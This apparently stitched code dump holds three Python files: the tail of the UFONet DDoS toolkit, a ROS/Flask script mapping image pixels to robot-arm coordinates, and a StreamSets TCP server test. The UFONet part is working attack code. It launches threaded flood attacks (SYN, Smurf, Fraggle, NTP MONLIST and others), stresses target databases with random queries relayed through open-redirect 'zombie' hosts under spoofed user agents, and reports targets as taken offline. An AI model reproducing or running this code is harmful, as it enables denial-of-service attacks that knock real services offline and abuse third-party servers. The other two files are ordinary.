self.t6 = threading.Thread(target=self.instance.attacking, args=(target, self.options.xmas)) # XMAS using threads
self.t6.daemon = True
self.t6.start()
self.update_xmas_stats() # add new XMAS attack to mothership stats
if nuke:
if sys.platform == "linux" or sys.platform == "linux2":
try:
self.options.nuke = int(nuke)
except:
self.options.nuke = 10000 # default NUKE requests
if self.options.nuke < 1:
self.options.nuke = 10000
self.instance = NUKE() # instance main class for NUKE operations
self.t7 = threading.Thread(target=self.instance.attacking, args=(target, self.options.nuke)) # NUKE using threads
self.t7.daemon = True # extra weapons are threaded as daemons
self.t7.start()
self.update_nuke_stats() # add new NUKE attack to mothership stats
else:
print("\n[Info] [AI] Your OS cannot perform this attack... -> [Passing!]\n")
if tachyon:
try:
self.options.tachyon = int(tachyon)
except:
self.options.tachyon = 1000 # default TACHYON requests
if self.options.tachyon < 1:
self.options.tachyon = 1000
self.instance = TACHYON() # instance main class for TACHYON operations
self.t8 = threading.Thread(target=self.instance.attacking, args=(target, self.options.tachyon)) # TACHYON using threads
self.t8.daemon = True
self.t8.start()
self.update_tachyon_stats() # add new TACHYON attack to mothership stats
if monlist:
try:
self.options.monlist = int(monlist)
except:
self.options.monlist = 1000 # default MONLIST requests
if self.options.monlist < 1:
self.options.monlist = 1000
self.instance = MONLIST() # instance main class for MONLIST operations
self.t9 = threading.Thread(target=self.instance.attacking, args=(target, self.options.monlist)) # MONLIST using threads
self.t9.daemon = True
self.t9.start()
self.update_monlist_stats() # add new MONLIST attack to mothership stats
if ufoack:
try:
self.options.ufoack = int(ufoack)
except:
self.options.ufoack = 101 # default UFOACK requests
if self.options.ufoack < 1:
self.options.ufoack = 101
self.instance = UFOACK() # instance main class for UFOACK operations
self.t10 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufoack)) # UFOACK using threads
self.t10.daemon = True
self.t10.start()
self.update_ufoack_stats() # add new UFOACK attack to mothership stats
if uforst:
try:
self.options.uforst = int(uforst)
except:
self.options.uforst = 101 # default UFORST requests
if self.options.uforst < 1:
self.options.uforst = 101
self.instance = UFORST() # instance main class for UFORST operations
self.t11 = threading.Thread(target=self.instance.attacking, args=(target, self.options.uforst)) # UFORST using threads
self.t11.daemon = True
self.t11.start()
self.update_uforst_stats() # add new UFORST attack to mothership stats
if droper:
try:
self.options.droper = int(droper)
except:
self.options.droper = 101 # default DROPER requests
if self.options.droper < 1:
self.options.droper = 101
self.instance = DROPER() # instance main class for DROPER operations
self.t12 = threading.Thread(target=self.instance.attacking, args=(target, self.options.droper)) # DROPER using threads
self.t12.daemon = True
self.t12.start()
self.update_droper_stats() # add new DROPER attack to mothership stats
if overlap:
try:
self.options.overlap = int(overlap)
except:
self.options.overlap = 101 # default OVERLAP requests
if self.options.overlap < 1:
self.options.overlap = 101
self.instance = OVERLAP() # instance main class for OVERLAP operations
self.t13 = threading.Thread(target=self.instance.attacking, args=(target, self.options.overlap)) # OVERLAP using threads
self.t13.daemon = True
self.t13.start()
self.update_overlap_stats() # add new OVERLAP attack to mothership stats
if pinger:
try:
self.options.pinger = int(pinger)
except:
self.options.pinger = 101 # default PINGER requests
if self.options.pinger < 1:
self.options.pinger = 101
self.instance = PINGER() # instance main class for PINGER operations
self.t14 = threading.Thread(target=self.instance.attacking, args=(target, self.options.pinger)) # PINGER using threads
self.t14.daemon = True
self.t14.start()
self.update_pinger_stats() # add new PINGER attack to mothership stats
if ufoudp:
try:
self.options.ufoudp = int(ufoudp)
except:
self.options.ufoudp = 101 # default UFOUDP requests
if self.options.ufoudp < 1:
self.options.ufoudp = 101
self.instance = UFOUDP() # instance main class for UFOUDP operations
self.t15 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufoudp)) # UFOUDP using threads
self.t15.daemon = True
self.t15.start()
self.update_ufoudp_stats() # add new UFOUDP attack to mothership stats
if fraggle:
try:
self.options.fraggle = int(fraggle)
except:
self.options.fraggle = 101 # default FRAGGLE requests
if self.options.fraggle < 1:
self.options.fraggle = 101
self.instance = FRAGGLE() # instance main class for FRAGGLE operations
self.t16 = threading.Thread(target=self.instance.attacking, args=(target, self.options.fraggle)) # FRAGGLE using threads
self.t16.daemon = True
self.t16.start()
self.update_fraggle_stats() # add new FRAGGLE attack to mothership stats
if sniper:
try:
self.options.sniper = int(sniper)
except:
self.options.sniper = 101 # default SNIPER requests
if self.options.sniper < 1:
self.options.sniper = 101
self.instance = SNIPER() # instance main class for SNIPER operations
self.t17 = threading.Thread(target=self.instance.attacking, args=(target, self.options.sniper)) # SNIPER using threads
self.t17.daemon = True
self.t17.start()
self.update_sniper_stats() # add new SNIPER attack to mothership stats
def stressing(self, target, zombie):
# perform a DDoS Web attack against a target, requesting records on target's database
options = self.options
db_input = self.options.dbstress
def random_key(length):
key = ''
for i in range(length):
key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
return key
# generating random alphanumeric queries
if self.db_flash > 9: # set db flash start on: 10
length = 1024 # search a heavy random length query (db flash): 1024
self.db_flash = 0 # reset db flash counter
else:
length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
key = str(random_key(length))
if self.db_flash > 9:
print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)")
else:
print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: " + key)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if not target.endswith('/'): # add "/" to end of target
target = target + "/"
url = zombie + target + db_input + key
req = urllib.request.Request(url, None, headers)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
try:
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except urllib.error.HTTPError as e:
if e.code == 401:
print('[Info] [AI] [DBStress] Not authorized')
elif e.code == 404:
print('[Info] [AI] [DBStress] Not found')
elif e.code == 503:
print('[Info] [AI] [DBStress] Service unavailable')
else:
print('[Info] [AI] [DBStress] Unknown error')
else:
print('[Info] [AI] [DBStress] Database query: HIT!')
def attackme(self, zombies):
# perform a DDoS Web attack against yourself
print("[AI] Starting local port to listening at: " + self.port + "\n")
print('='*21 + "\n")
self.doll=Doll(self)
self.doll.start()
while not self.doll._armed:
time.sleep(1)
# send Open Redirect injection (multiple zombies-multiple target urls)
target = ""
self.injection(target, zombies)
self.doll.shutdown()
self.doll.join()
self.herd.list_fails()
def check_target_status(self):
if self.num_is_down > 0 and self.num_is_up == 0: # check for: 1 or more down, 0 up
print("\n[Info] [AI] Congratulations!! -> [Target looks OFFLINE!]\n")
if not self.options.forceyes:
update_reply = input("[AI] Do you want to send a [HEAD] check request? (y/N)")
print("\n" + '-'*25)
else:
update_reply = "N"
if update_reply == "y" or update_reply == "Y":
try: # send HEAD connection
self.head = True
reply = self.connect_zombie(target)
self.head = False
if reply:
print("\n[Info] [AI] [Control] Target has replied you! -> [Keep shooting!]\n")
else:
print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
self.update_targets_crashed() # update targets crashed stats
self.update_mothership_stats() # update mothership completed attack stats
except Exception:
print("\n[Error] [AI] Something wrong with your connection!...\n")
if DEBUG == True:
traceback.print_exc()
return
else:
print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
self.update_targets_crashed() # update targets crashed stats
self.update_mothership_stats() # update mothership completed attack stats
return
def starting_target_check(self, target, head_check):
options = self.options
head_check_here = False
head_check_external = False
if options.disablehead: # check at start is disabled (skipping!)
print("[Info] [AI] Skipping external check...\n")
head_check_here = True
head_check_external = True
else:
if head_check:
if not options.attackme:
print("[AI] Launching: 'Is target up?' check...\n")
try: # send HEAD connection
self.head = True
reply = self.connect_zombie(target)
self.head = False
if reply:
print("[Info] [AI] [Control] From YOU: YES -> ["+str(reply)+"-OK]")
head_check_here = True
else:
print("[Info] [AI] [Control] From YOU: NO -> [Target looks OFFLINE!]")
head_check_here = False
except Exception:
print("[Error] [AI] [Control] From YOU: NO -> [Cannot connect!]")
if DEBUG == True:
traceback.print_exc()
head_check_here = False
else: # check if local IP/PORT is listening on mothership
print("[AI] Launching: 'Is NAT ready?' check...\n")
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
result = sock.connect_ex(('0.0.0.0',8080))
if result == 0 or result == 110: # black magic
print("[Info] [AI] [Control] Local port: YES | Mothership accesible from -private- IP: http://0.0.0.0:8080")
head_check_here = True
else:
print("[Info] [AI] [Control] Local port: NO | Something goes wrong with your port: 8080")
head_check_here = False
except Exception:
print("[Error] [AI] [Control] Local port: NO | Something wrong checking for open ports...")
if DEBUG == True:
traceback.print_exc()
head_check_here = False
else:
head_check_here = True
# check target using external check services
self.external = True
if not options.attackme:
try:
target = self.parse_url_encoding(target) # parse for proper url encoding
try:
url = self.external_check_service1 + target # check from external service [1]
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
external_reply = urllib.request.urlopen(req, context=self.ctx).read()
if b"returned code 200 OK and is up" in external_reply:
t = urlparse(self.external_check_service1)
name_external1 = t.netloc
print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external1+"]")
head_check_external = True
except:
url = self.external_check_service2 + target # check from external service [2]
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
try:
req_reply = urllib.request.urlopen(req, context=self.ctx).read()
if b"It's just you" in req_reply:
t = urlparse(self.external_check_service2)
name_external2 = t.netloc
print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external2+"]")
head_check_external = True
else:
print("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
head_check_external = False
except urllib.error.HTTPError as e:
if e:
print("[Error] [AI] [Control] [ "+ self.external_check_service2 +" ] isn't replying to your requests! -> [Passing!]")
print ("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
head_check_external = False
except Exception:
print("[Error] [AI] [Control] From OTHERS: NO -> [Cannot connect!]")
if DEBUG == True:
traceback.print_exc()
head_check_external = False
else:
try: # check mothership from public ip / NAT using HEAD request
try:
req = urllib.request.Request(str(self.pub_ip+":8080"), method="HEAD")
reply = urllib.request.urlopen(req)
except Exception:
reply = None
if reply:
print("[Info] [AI] [Control] From OTHERS: YES -> [Mothership OK!] -> ["+str(self.pub_ip)+":8080]")
head_check_external = True
else:
print("[Info] [AI] [Control] From OTHERS: NO -> [Cannot connect!] -> [NAT is failing!]")
head_check_external = False
head_check_here = False # stop attack if not public IP available
except Exception:
print("[Error] [AI] [Control] From OTHERS: NO -> [Check failed!]")
head_check_here = False # stop attack if not public IP available
if DEBUG == True:
traceback.print_exc()
head_check_external = False
self.external = False
return head_check_here, head_check_external
def injection(self, target, zombies, head_check = True):
options = self.options
# check target's integrity at start
head_check_here, head_check_external = self.starting_target_check(target, head_check)
# ask user to confirm the attack
if head_check_here == True or head_check_external == True:
if not self.options.forceyes:
if not options.attackme:
if not options.disablehead:
start_reply = input("\n[AI] Target is ONLINE!. Do you want to start an attack? (y/N)\n")
else:
start_reply = input("[AI] Do you want to start an attack, directly? (y/N)\n")
else:
if not options.disablehead:
start_reply = input("\n[AI] Mothership is READY!. Do you want to start an attack 'against yourself'? (y/N)\n")
else:
start_reply = input("[AI] Do you want to start an attack 'against yourself', directly? (y/N)\n")
else:
start_reply = "Y"
if start_reply == "y" or start_reply == "Y":
if options.attackme:
total_rounds = 2 # default rounds for attackme
else:
total_rounds = options.rounds # extract number of rounds
try:
total_rounds = int(total_rounds)
except:
total_rounds = 1
if not total_rounds:
total_rounds = 1
if total_rounds <= 0:
total_rounds = 1
self.herd.cleanup()
num_round = 1
num_hits = 0
num_zombie = 1
# start to attack the target with [MODS]
if options.loic or options.loris or options.ufosyn or options.spray or options.smurf or options.fraggle or options.xmas or options.ufoack or options.uforst or options.droper or options.overlap or options.pinger or options.ufoudp or options.nuke or options.tachyon or options.monlist or options.sniper:
ex = threading.Thread(target=self.aiming_extra_weapons, args=(target, self.options.proxy, self.options.loic, self.options.loris, self.options.ufosyn, self.options.spray, self.options.smurf, self.options.fraggle, self.options.xmas, self.options.ufoack, self.options.uforst, self.options.droper, self.options.overlap, self.options.pinger, self.options.ufoudp, self.options.nuke, self.options.tachyon, self.options.monlist, self.options.sniper)) # multithreading flow for extra attacks
ex.daemon = True # extra weapons are threaded as daemons
ex.start()
# start to attack the target with [ARMY]
zombies = self.extract_zombies() # extract zombies from file
if zombies:
self.total_zombie = len(zombies)
else:
self.total_zombie = 0
return
self.herd=Herd(self)
if not self.options.disablepurge:
self.discardzombies = []
self.discard_aliens = []
self.discard_droids = []
self.discard_rpcs = []
self.discard_ucavs = []
total_disc_zombies = 0
self.num_discard_zombies = 0
self.num_discard_aliens = 0
self.num_discard_droids = 0
self.num_discard_rpcs = 0
self.num_discard_ucavs = 0
self.empty_zombies = False
for i in range(0, int(total_rounds)): # start attacking using rounds
print ("\x1b[2J\x1b[H")# clear screen (black magic)
print('='*42)
print('Starting round:', num_round, ' of ', total_rounds)
print('='*42)
self.herd.reset()
self.extra_zombies_lock = True
self.total_zombies_failed_connection = 0 # reset failed [Zombies] connection counter each round
self.send_zombies(zombies) # send [Zombies]
if not self.options.attackme:
if not self.options.disablealiens or not self.options.disabledroids or not self.options.disablerpcs or not self.options.disableucavs:
if self.options.verbose:
print("[Info] [AI] [Control] All [Zombies] have returned for this round... -> [Waiting!]")
self.send_extra_zombies() # send [ARMY]
while self.extra_zombies_lock == True:
time.sleep(1) # wait for [ARMY] to return
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] [Control] Full [ARMY] has returned for this round! -> [Refolding!]")
else:
zombies_lock = 0
if self.options.expire: # set timing for purge
try:
timing = int(self.options.expire)
except:
timing = self.expire_timing # default timing for purge
else:
timing = self.expire_timing # default timing for purge
if timing < 1:
timing = self.expire_timing # default timing for purge
zombies_arrival_timing = timing # timing = trying to control round time for threading flow
while self.herd.no_more_zombies() == False: # waiting for [Zombies] to return
zombies_lock = zombies_lock + 1
if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
if self.options.verbose:
print("[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
break
else:
time.sleep(1)
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] [Control] All [Zombies] have returned for this round! -> [Refolding!]")
if not self.options.attackme and not self.options.disableucavs: # check for target's status returned by [UCAVs]
self.check_target_status()
if not self.options.attackme and not self.options.disablepurge: # enable [Zombies] purge round check
self.abandoning_zombies() # check for abandoning zombies
for zombie in self.herd.done: # check for num hits
if self.herd.connection_failed(zombie) == False:
num_hits = num_hits + 1
num_zombie = num_zombie + 1
if num_zombie > self.total_zombie:
num_zombie = 1
if not self.options.attackme and not self.options.disablescanner: # perform a broadband test on target
check_is_loading = self.check_is_loading(target)
self.herd.dump_html()
if not self.options.disablepurge:
if self.empty_zombies == True:
break # exit routine when not any more zombies
num_round = num_round + 1
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] This battle is over! -> [Reporting!]")
if self.options.loic: # try to stop daemons/threads for extra weapons
self.t1.join()
if self.options.loris:
self.t2.join()
if self.options.ufosyn:
self.t3.join()
if self.options.spray:
self.t4.join()
if self.options.smurf:
self.t5.join()
if self.options.xmas:
self.t6.join()
if self.options.nuke:
self.t7.join()
if self.options.tachyon:
self.t8.join()
if self.options.monlist:
self.t9.join()
if self.options.ufoack:
self.t10.join()
if self.options.uforst:
self.t11.join()
if self.options.droper:
self.t12.join()
if self.options.overlap:
self.t13.join()
if self.options.pinger:
self.t14.join()
if self.options.ufoudp:
self.t15.join()
if self.options.fraggle:
self.t16.join()
if self.options.sniper:
self.t17.join()
if self.options.target_list:
self.num_target_list = self.num_target_list - 1 # num_target_list = 0 provokes exit!
print ("\x1b[2J\x1b[H") # black magic
if not self.options.attackme: # show herd results
self.herd.dump()
else: # show doll results
print('='*21)
print("\n[Info] [AI] Mothership transmission...\n")
num_real_zombies = len(self.doll.real_zombies)
print("[Info] [AI] Total of [Zombies] that are 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n")
for z in self.doll.real_zombies: # show only alien verified zombies
for x in z:
print(" - " + str(x))
self.herd.dump_html(True) # show (all) zombies statistics
if not self.options.attackme:
if not self.options.disablepurge:
print("\n[Info] [AI] Report completed! -> [Purging!]\n")
else:
if not options.target_list:
print("\n[Info] [AI] Report completed! -> [Exiting!]\n")
else:
print("\n[Info] [AI] Report completed! -> [OK!]\n")
self.update_mothership_stats() # update mothership stats
if not self.options.disablepurge:
print('='*21+ "\n")
total_disc_zombies = self.num_discard_zombies + self.num_discard_aliens + self.num_discard_droids + self.num_discard_rpcs + self.num_discard_ucavs
if total_disc_zombies > 0 and total_disc_zombies < 2:
print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] unit that isn't working as expected...\n")
elif total_disc_zombies > 1:
print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] units that aren't working as expected...\n")
if self.num_discard_zombies > 0:
print(" + Zombies: ["+ str(self.num_discard_zombies)+"]")
if self.num_discard_aliens > 0:
print(" + Aliens : ["+ str(self.num_discard_aliens)+"]")
if self.num_discard_droids > 0:
print(" + Droids : ["+ str(self.num_discard_droids)+"]")
if self.num_discard_rpcs > 0:
print(" + X-RPCs : ["+ str(self.num_discard_rpcs)+"]")
if self.num_discard_ucavs > 0:
print(" + UCAVs : ["+ str(self.num_discard_ucavs)+"]")
if total_disc_zombies > 0:
if not self.options.forceyes:
if total_disc_zombies > 0 and total_disc_zombies < 2:
backup_reply = input("\n[AI] Do you want to purge it from your files? (Y/n)\n")
elif total_disc_zombies > 1:
backup_reply = input("\n[AI] Do you want to purge them from your files? (Y/n)\n")
else:
backup_reply = "Y"
if backup_reply == "y" or backup_reply == "Y":
print("\n[Info] [AI] Purging failed units from files...\n")
discarded = []
if self.num_discard_zombies > 0:
for z in self.discardzombies:
discarded.append(z)
print(" + [Info] [Zombies] "+z+" -> [Purged!]")
if self.num_discard_aliens > 0:
for a in self.discard_aliens:
discarded.append(a)
print(" + [Info] [Aliens] "+a+" -> [Purged!]")
if self.num_discard_droids > 0:
for d in self.discard_droids:
discarded.append(d)
print(" + [Info] [Droids] "+d+" -> [Purged!]")
if self.num_discard_rpcs > 0:
for r in self.discard_rpcs:
discarded.append(r)
print(" + [Info] [X-RPCs] "+r+" -> [Purged!]")
if self.num_discard_ucavs > 0:
for u in self.discard_ucavs:
discarded.append(u)
print(" + [Info] [UCAVs] "+u+" -> [Purged!]")
disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
if disc_zombies > 0 and disc_zombies < 2:
print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] unit! -> [OK!]\n")
elif disc_zombies > 1:
print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] units! -> [OK!]\n")
if not self.options.target_list:
print('-'*21+ "\n")
print("[AI] "+self.exit_msg+"\n")
if not self.options.web:
return
else:
if self.num_target_list > 0: # still more targets
print('-'*21+ "\n")
print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]\n")
return
else: # finish attack from multiple targets
print('-'*21+ "\n")
print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]")
print("\n"+ '='*21+ "\n")
print("[Info] [AI] All your battles have ended! -> [Exiting!]")
print("\n"+ '-'*21+ "\n")
print("[AI] "+self.exit_msg+"\n")
if not self.options.web:
return
else:
if num_real_zombies < 1: # not any 100% vulnerable zombie found
print("\n[Info] [AI] [Control] Not any 100% vulnerable zombie found! -> [Exiting!]\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
if not options.web:
sys.exit(2) # exit
else:
return
else:
print("\n" + '='*21)
AI_reply = input("\n[AI] Do you prefer a 'fortune' cookie instead? (y/N)\n")
if AI_reply == "y" or AI_reply == "Y":
self.AI() # AI fortune cookie
print('-'*21+ "\n")
print("\n[AI] "+self.exit_msg+"\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
if not options.web:
sys.exit(2) # exit
else:
return
else:
if not options.attackme:
print("\n[Info] [AI] "+target+" -> [Target looks OFFLINE!]")
else:
print("\n[Error] [AI] NAT is not working correctly! -> [Exiting!]")
print("\n" + '-'*21)
print("\n[AI] "+self.exit_msg+"\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
return
if __name__ == "__main__":
app = UFONet()
options = app.create_options()
if options:
app.run()
|
move_arm_to_pixel.py
|
#!/usr/bin/env python
import io
import os
import threading
import time
import json
from copy import deepcopy
import rospy
import rospkg
from flask import Flask, request
from flask import render_template, send_file, redirect, url_for
from std_msgs.msg import Header
from sensor_msgs.msg import Image
from geometry_msgs.msg import PointStamped
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
import tf
import tf2_ros
from calibration.calibration_arm_control_client import ArmControlClient
print(ArmControlClient)
from easy_handeye.handeye_client import HandeyeClient
app = Flask(__name__)
app.debug = True
# Run ros node on different thread than flask
# threading.Thread(target=lambda: rospy.init_node('test_node', disable_signals=True)).start()
rospy.init_node('test_move_gui_server')
################################
# Setup camera topic
camera_topic = rospy.get_param('camera_topic', '/camera/color/image_raw')
depth_topic = rospy.get_param('depth_topic', '/camera/aligned_depth_to_color/image_raw')
source_frame = None
listener = tf.TransformListener()
target_frame = rospy.get_param('target_frame', 'ar_marker_2')
rgb_img = None
rgb_img_lock = threading.Lock()
depth_img = None
depth_img_lock = threading.Lock()
def rgb_img_callback(data):
img_data = CvBridge().imgmsg_to_cv2(data, "bgr8")
rgb_img_lock.acquire()
global source_frame
global rgb_img
source_frame = data.header.frame_id
rgb_img = deepcopy(img_data)
rgb_img_lock.release()
def depth_img_callback(data):
img_data = CvBridge().imgmsg_to_cv2(data, "passthrough")
depth_img_lock.acquire()
global depth_img
depth_img = deepcopy(img_data)
depth_img_lock.release()
rospy.Subscriber(camera_topic, Image, rgb_img_callback, queue_size=1)
rospy.Subscriber(depth_topic, Image, depth_img_callback, queue_size=1)
def point_msg(p, frame_id):
ps = PointStamped()
ps.point.x = p[0]
ps.point.y = p[1]
ps.point.z = p[2]
ps.header = Header()
ps.header.stamp = rospy.Time.now()
ps.header.frame_id = frame_id
return ps
@app.route('/')
def index():
rv = render_template('move.html')
a = request.args.get('')
# ps = point_msg([0, 1, 2], 'base_link')
# print(ps)
return rv
# return 'hello'
intrinsic_mat = [926.739013671875, 0.0, 625.3572387695312, 0.0, 0.0, 925.6869506835938, 350.6984558105469, 0.0, 0.0, 0.0, 1.0, 0.0]
intrinsic_mat = np.array(intrinsic_mat).reshape(3, 4)
intrinsic_mat = intrinsic_mat[:3, :3]
intrinsic_mat_inv = np.linalg.inv(intrinsic_mat)
# Reference:
# https://answers.ros.org/question/146111/tf-python-api-transform-points/
@app.route('/move')
def move():
q = request.query_string
try:
x, y = q.split(',')
x = int(x)
y = int(y)
except Exception as e:
return str(e)
with rgb_img_lock:
with depth_img_lock:
if rgb_img is None:
return 'No image'
if depth_img is None:
return 'No depth image'
assert x < rgb_img.shape[1]
assert y < rgb_img.shape[0]
xy_one = [x, y, 1]
z = depth_img[y, x] / 1e3
xyz = np.dot(intrinsic_mat_inv, xy_one) * z
msg = point_msg(xyz, source_frame)
print(msg)
now = rospy.Time.now()
listener.waitForTransform('ar_marker_2', source_frame, now, rospy.Duration(10))
ar_tf = listener.lookupTransform(source_frame, 'ar_marker_2', rospy.Time())
t = listener.getLatestCommonTime("ar_marker_2", source_frame)
new_msg = listener.transformPoint('ar_marker_2', msg)
return str(ar_tf) + '<br />' + str(xyz) + '<br />' + str([new_msg.point.x, new_msg.point.y, new_msg.point.z])
return ''
@app.route('/rgb_image.png')
def get_rgb_image():
# Get image from ros topic
rgb_img_lock.acquire()
global rgb_img
if rgb_img is None:
return ''
rv, buffer = cv2.imencode('.png', rgb_img)
img_file = io.BytesIO(buffer)
rv = send_file(img_file, attachment_filename='rgb.png', mimetype='image/png')
rgb_img_lock.release()
return rv
@app.route('/depth_image.png')
def get_depth_image():
# Get image from ros topic
depth_img_lock.acquire()
global depth_img
if depth_img is None:
return ''
depth_img_out = depth_img.astype(np.float32)
depth_img_out = np.clip(depth_img_out, 400, 1000) - 400
depth_img_out = depth_img_out / 600 * 255
depth_img_out = np.clip(depth_img_out, 0, 255)
depth_img_out[depth_img_out == 255] = 0
# depth_img_out /= 10
depth_img_out = depth_img_out.astype(np.uint8)
rv, buffer = cv2.imencode('.png', depth_img_out)
img_file = io.BytesIO(buffer)
rv = send_file(img_file, attachment_filename='depth.png', mimetype='image/png')
# cv2.imshow('depth', depth_img)
# cv2.waitKey(1000)
depth_img_lock.release()
return rv
if __name__ == '__main__':
app.run(port=5000)
|
test_tcp_server.py
|
# Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import socket
import ssl
from collections import namedtuple
from threading import Thread
import pytest
from streamsets.testframework.environment import TCPClient
from streamsets.testframework.markers import sdc_min_version
logger = logging.getLogger(__name__)
# TODO: convert to pipeline param. seems to not work (see below)
TCP_PORT = 17892
TCP_SSL_FILE_PATH = './resources/tcp_server/file.txt'
# TCP keystore file path relative to $SDC_RESOURCES.
TCP_KEYSTORE_FILE_PATH = 'resources/tcp_server/keystore.jks'
@pytest.fixture(scope='module')
def tcp_server_pipeline(sdc_builder, sdc_executor):
"""Creates a pipeline with a TCP server origin using TEXT data with default separated records."""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server = pipeline_builder.add_stage('TCP Server')
tcp_server.configuration.update({'conf.dataFormat': 'TEXT',
# TODO: convert to param; this doesn't work
# 'conf.ports': ['${TCP_LISTEN_PORT}'],
'conf.ports': [str(TCP_PORT)],
'conf.tcpMode': 'DELIMITED_RECORDS',
'conf.recordProcessedAckMessage': 'record_${record:value(\'/text\')}'})
wiretap = pipeline_builder.add_wiretap()
tcp_server >> wiretap.destination
pipeline = pipeline_builder.build()
sdc_executor.add_pipeline(pipeline)
# Yield a namedtuple so that we can access instance names of the stages within the test.
yield namedtuple('Pipeline', ['pipeline', 'wiretap'])(pipeline, wiretap)
def test_tcp_server_simple(sdc_executor, tcp_server_pipeline):
"""Runs a test using the TCP server origin pipeline and asserts that the test record is created, with ack."""
# Start TCP Server pipeline.
expected_msg = 'hello_world'
sdc_executor.start_pipeline(tcp_server_pipeline.pipeline)
# create TCP client and send the data
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
# default separator is newline
record_ack1 = tcp_client.send_str_and_ack(f'{expected_msg}\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline.pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(tcp_server_pipeline.pipeline)
read_data = tcp_server_pipeline.wiretap.output_records
assert len(read_data) == 1
assert read_data[0].field['text'].value == expected_msg
assert record_ack1 == f'record_{expected_msg}'
# SDC-10425
@sdc_min_version('3.0.0.0') # Need the delay processor
def test_stop_tcp_with_delay(sdc_builder, sdc_executor):
"""Make sure that the origin can properly be started after stopping it with long batch times."""
builder = sdc_builder.get_pipeline_builder()
message = 'Something not important'
tcp_server = builder.add_stage('TCP Server')
tcp_server.configuration.update({'conf.dataFormat': 'TEXT',
'conf.ports': [str(TCP_PORT)],
'conf.tcpMode': 'DELIMITED_RECORDS',
'conf.recordProcessedAckMessage': 'record_${record:value(\'/text\')}'})
# Make sure that each batch takes at least 5 seconds
delay = builder.add_stage('Delay')
delay.delay_between_batches = 5 * 1000
wiretap = builder.add_wiretap()
tcp_server >> delay >> wiretap.destination
pipeline = builder.build()
sdc_executor.add_pipeline(pipeline)
# Let's start/stop the pipeline few times, it should always properly wait for graceful shutdown and subsequent
# start of pipeline should be immediate.
for _ in range(3):
wiretap.reset()
# Start the pipeline
sdc_executor.start_pipeline(pipeline)
# Send exactly one record
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
tcp_client.send_str_and_ack(message + '\n')
# Wait until at least 1 record is processed
sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(pipeline)
assert len(wiretap.output_records) == 1
assert [message] == [record.field['text'] for record in wiretap.output_records]
@sdc_min_version('3.7.0')
def test_tcp_server_read_timeout(sdc_builder, sdc_executor):
"""Runs a test using TCP Server Origin and setting Read Timeout to 20 seconds.
Then checks connection is automatically closed after 20 seconds as the timeout is triggered.
As the destination is not relevant for this stage the pipeline looks like:
TCP Server >> wiretap
"""
expected_message = 'testMessage'
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
data_format='TEXT',
read_timeout_in_seconds=20)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(title=f'TCP Server Origin Read Timeout')
